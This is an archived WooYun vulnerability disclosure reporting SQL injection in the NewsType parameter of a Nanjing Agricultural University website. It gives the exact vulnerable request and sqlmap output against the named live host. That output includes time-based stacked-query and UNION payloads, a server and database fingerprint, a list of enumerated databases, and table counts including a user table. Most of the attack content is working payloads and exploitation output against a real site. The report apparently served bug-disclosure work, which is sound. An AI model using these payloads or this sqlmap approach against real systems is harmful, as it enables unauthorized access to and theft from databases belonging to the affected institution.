乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-02: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://jysx.njau.edu.cn/ 南京农业大学教育思想大讨论专题网站
GET /ShowNews.aspx?NewsType=-1&N_Id=65&TypeNum=6 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://jysx.njau.edu.cnCookie: ASP.NET_SessionId=bbds11455c2syk55jft1fd55Host: jysx.njau.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
NewsType参数存在注入
sqlmap identified the following injection point(s) with a total of 67 HTTP(s) requests:---Parameter: NewsType (GET) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: NewsType=-1;WAITFOR DELAY '0:0:5'--&N_Id=65&TypeNum=6 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: NewsType=-1 UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(112)+CHAR(113)+CHAR(72)+CHAR(97)+CHAR(108)+CHAR(71)+CHAR(66)+CHAR(115)+CHAR(103)+CHAR(70)+CHAR(98)+CHAR(83)+CHAR(117)+CHAR(70)+CHAR(68)+CHAR(108)+CHAR(119)+CHAR(101)+CHAR(66)+CHAR(88)+CHAR(113)+CHAR(90)+CHAR(70)+CHAR(110)+CHAR(108)+CHAR(98)+CHAR(104)+CHAR(68)+CHAR(116)+CHAR(98)+CHAR(119)+CHAR(97)+CHAR(111)+CHAR(87)+CHAR(66)+CHAR(111)+CHAR(74)+CHAR(109)+CHAR(69)+CHAR(109)+CHAR(83)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)-- -&N_Id=65&TypeNum=6---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005
available databases [10]:[*] db_nnbjyy[*] db_nnsx[*] db_nnzwsc[*] db_wdscholarship[*] master[*] model[*] msdb[*] NJNYD_PT[*] ReportServer[*] tempdb
Database: db_nnsx+----------------------+---------+| Table | Entries |+----------------------+---------+| dbo.T_Log | 420 || dbo.View_CharView | 76 || dbo.T_NewsInfo | 62 || dbo.View_AllInfo | 62 || dbo.View_NesTypeInfo | 62 || dbo.View_Video | 62 || dbo.T_User | 29 || dbo.T_Channel | 12 || dbo.T_AnswerInfo | 3 || dbo.T_ForumInfo | 2 |+----------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-12-07 12:02
漏洞Rank:4 (WooYun评价)
暂无